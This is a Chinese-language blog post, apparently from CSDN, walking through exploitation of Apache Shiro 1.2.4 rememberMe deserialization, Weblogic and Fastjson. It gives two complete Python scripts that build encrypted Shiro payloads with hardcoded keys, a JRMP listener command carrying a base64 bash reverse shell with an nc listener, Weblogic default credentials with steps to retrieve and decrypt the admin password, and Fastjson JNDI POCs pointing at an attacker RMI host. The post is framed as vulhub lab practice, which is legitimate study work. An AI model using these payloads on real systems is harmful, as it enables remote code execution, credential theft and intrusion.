框架漏洞RCE-3

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量976 收藏 18
点赞数 35
分类专栏: 渗透进阶 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x88125E/article/details/138378411
版权
本文探讨了ApacheShiro1.2.4中的AES加密密钥泄露导致的反序列化漏洞,以及如何通过构造恶意输入进行攻击。同时,还介绍了Weblogic中的反序列化漏洞利用方法,涉及Fastjson的序列化问题和漏洞利用技术。
摘要由CSDN通过智能技术生成

一、序列化和反序列化

1、序列化:序列化就是把对象转换成字节流,便于计算机保存在内存、文件、数据库中

2、反序列化:就是序列化的逆过程

3、在PHP中序列化和反序列化对应的函数分别为serialize()和unserialize()

4、反序列化漏洞:通过构造恶意输入,让反序列化产生非预期的对象,在此过程中执行构造的任意代码。

二、shiro1.2.4

1、Apache Shiro是一个Java安全框架,能执行身份验证、授权、密码和会话管理功能。

2、漏洞形成原因:AES加密的密钥Key被强制编码在代码里,而Shiro又是开源软件,意味着所有人都可以通过源代码获取密钥

3、流程:攻击者构造一个恶意代码-->序列化-->AES加密-->base64编码-->通过cookie的rememberMe字段发送。shiro接收字段-->base64解密-->AES解密-->反序列化。

4、漏洞检测(BP抓包),查看返回包是否有rememberMe字段

(1)、未登录的情况下,返回包没有该字段。尝试在请求包中的cookie中加入rememberMe=1后,查看返回包有没有rememberMe字段(若先前请求包的cookie有值,需要清空)

注:需要注意cookie字段的位置

(2)、登录且点了remember,返回包有该字段可以判断可能存在漏洞

5、漏洞利用

(1)、使用工具:liqun工具箱等

(2)、使用python脚本

6、漏洞复现

(1)、验证漏洞是否存在

  • dnslog申请一个临时域名
  • 使用shiro.py脚本,生成payload.cookie文件
    • python3 shiro.py "http://dnslog生成的域名"
    • 若报错说没有crypto,下载:pip install pycryptodome
#shiro.py

import sys
import base64
import uuid
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-master-SNAPSHOT.jar', 'URLDNS', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    #key =  "Z3VucwAAAAAAAAAAAAAAAA=="
    #key = "wGiHplamyXlVB11UXWol8g=="
	
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("payload.cookie", "w") as fpw:
        print("rememberMe={0}".format(payload.decode()),file=fpw)

将生成的内容复制到请求包的cookie字段中,发送(原来的cookie中的内容不能删掉)

查看dnslog网站,是否存在解析记录。有就可能存在

(2)、漏洞利用

  • 攻击者打开监听端口:nc -lvp 520
  • 再开一个窗口,开启JRMP(端口设置为9999,随便设)
    • java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099CommonsCollections4 "bash -c {echo,base64编码的反弹shell}|{base64,-d}|{bash,-i}"
  • 使用so.py构造payload
    • python3 so.py 攻击者ip:9999
#so.py

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-master-SNAPSHOT.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    print("rememberMe={0}".format(payload.decode()))
  • 将生成的内容复制到请求包的cookie字段中,发送。(前端必须勾选rememberMe)
  • 查看是否反射成功

7、靶场:vulhub

8、特殊:Apache Shiro 认证绕过漏洞 CVE-2020-1957 漏洞复现

三、Weblogic反序列化漏洞

1、漏洞产生原因:利用rmi远程调用框架绕过黑名单限制,将内容解析,造成反序列化漏洞。

2、weblogic常用端口:7001

3、特征:显示404错误

4、进入后台:http://ip地址:7001/console或在域名后面加上/console/login/LoginForm.jsp

常见弱口令
systempassword/security
weblogicweblogic/Oracle@123
wlcsystemwlcsystem
adminadmin
joepassword
marypassword
wlpisystemwlpisystem

5、使用工具利用:java反序列化漏洞利用工具

6、漏洞利用:靶场为vulhub-weblogic--weak_password

  • bp抓包,请求方式后面更改访问URL,为URL+?path=security/SerializedSystemIni.dat发送
    • 返回包会得到一串乱码,右键copy to file保存成文件,文件名为:SerializedSystemIni.dat
  • bp抓包,请求方式后面更改访问URL,为URL+?path=config/config.xml
    • 返回包中的<node-manager-password-encrypted>的值,即为加密后的管理员密码
  • 打开jar工具:jave -jar weblogic_decrypt.jar
    • 输入以上获得的两个值,点击确定,就会获得密码

注:靶场登录后还有文件上传漏洞

7、扩展:尝试其他weblogic反序列化漏洞

四、fastjson漏洞

1、漏洞产生原因:当一个类只有一个接口的时候,将这个类的对象序列化的时候,就会将子类抹去,只保留接口的类型,最后导致反序列化时无法得到原来的类型。

推荐资料:Fastjson反序列化漏洞原理

2、判断是否存在:

(1)、抓包,发现返回包中有JSON格式或fastjson关键字

(2)、抓包,改变请求格式get/post---》将content-type 请求头修改为 application/json---》将get请求的返回包中的大括号包裹的内容复制到post请求包并发送,看返回包结果是否与请求包中一致。

(3)、抓包,改变请求格式get/post---》将content-type 请求头修改为 application/json---》将POC放到请求包下面并发送,查看dnslog网站是否有解析记录

POC:{"a":{"@type":"java.net.Inet4Address","val":"dnslog生成的域名"}}

3、漏洞利用(与log4j2方法a类似)

与log4j2不同点:bp发送的POC不一样。

#POC
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://攻击者IP地址:端口/Exploit",
        "autoCommit":true
  }

个人认知有限,大家可以提建议或者推荐更好的文章。互相分享,提高自身水平!

x88125E
关注
  • 35
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
向日葵RCE漏洞一键批量自己检测工具
02-25
【标题】:“向日葵RCE漏洞一键批量自我检测工具” 在网络安全领域,"RCE"是"Remote Code Execution"的缩写,意为远程代码执行。这是一个非常严重的安全漏洞,允许攻击者在目标系统上执行任意代码,从而获得与系统...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
常见框架漏洞
2301_76786857的博客
01-17 2124
Web框架(Web framework)或者叫做Web应用框架(Web application framework),是用于进行Web开发的一套软件架构。大多数的Web框架提供了一套开发和部署网站的方式。为Web的行为提供了一套支持的方法。使用Web框架,很多的业务逻辑外的功能不需要自己再去完善,而是使用框架已有的功能就可以。如图片验证码 , 数据库交互语句等
05 shiro的Remeber me
张力的程序园
11-20 85
在了解了shiro中的缓存管理之后,我们接下来再来测试shiro中的“记住我”功能。 1、前提约束 完成shiro与spring的整合 https://www.jianshu.com/p/a352b6338833 2、理论解释 在通常的认证管理当中,每次登录都需要输入账号密码,用户体验不好。能否让用户在一段时间之内只登录一次。那就意味着必须把用户的登录信息存储起来,而我们这里...
Spring Boot 3 + Spring Security 6 最新版本修改 Json 登录后 RememberMe 功能问题失效的解决方案
qq_42378797的博客
11-28 1139
当 Spring Boot 版本更新到 3 之后,最低要求的 JDK 版本变为 17,相应的 最新版本的 Spring Security 的配置也发生了变化,一下主要讲解一些新的 Spring Security 的配置方法。
基于JavaScript的框架漏洞_javascript框架漏洞
m0_60607245的博客
04-09 876
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
常见的框架漏洞
m0_46467017的博客
08-20 7903
Shiro默认使用了CookieRememberMeManager, 其处理cookie的流程是: 得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化.然而AES的密钥是硬编码的, 密钥泄漏的根本原因是开发人员在开发过程中部分代码直接使用了网上的一些开源的项目代码,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。cookie的key为RemeberMe,cookie的值是经过对相关信息进⾏序列化,然后使⽤aes加密,最后在使⽤base64编码处理形成的。
框架漏洞RCE-1
x88125E的博客
05-01 2152
前置知识,thinkphp5.0.23漏洞
框架漏洞RCE-2
x88125E的博客
05-01 775
struts2、log4j2
Thinkphp框架漏洞--->5.0.23 RCE
huohaowen的博客
03-01 1496
本篇文章来讲一下thinkphp的框架漏洞
ThinkPHP3.2.x RCE漏洞通报1
08-03
【ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
2. **Javaweb-Struts2框架RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求,攻击者可以执行任意Java代码。 3. **一句话Webshell后门**:这是一种简单的Web后门,仅用一行代码即可...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 441
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1088
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 321
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
内网安全:IPC横向
8888的博客
07-23 697
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
flask框架rce
09-07
在CTF比赛中遇到Flask框架漏洞的题目时,可以参考一篇详细的博文来了解有关该漏洞的更多信息。这篇博文可能提供了关于Flask框架的介绍、应用程序的结构和配置等方面的详细内容。 在Flask应用程序中,应用程序的所有...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值